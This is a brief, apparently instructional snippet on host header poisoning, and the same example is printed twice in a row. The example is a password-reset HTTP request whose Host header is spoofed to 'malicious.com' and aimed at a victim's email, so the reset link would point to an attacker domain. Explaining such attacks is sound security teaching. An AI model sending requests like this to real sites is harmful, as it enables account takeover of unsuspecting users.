Host Header Poisoning
A Spoofed Host HeaderPOST /password/reset HTTP/1.1
Host: malicious.com
Content-Type: application/x-www-form-urlencoded
email=victim@gmail.comA Spoofed Host HeaderPOST /password/reset HTTP/1.1
Host: malicious.com
Content-Type: application/x-www-form-urlencoded
email=victim@gmail.com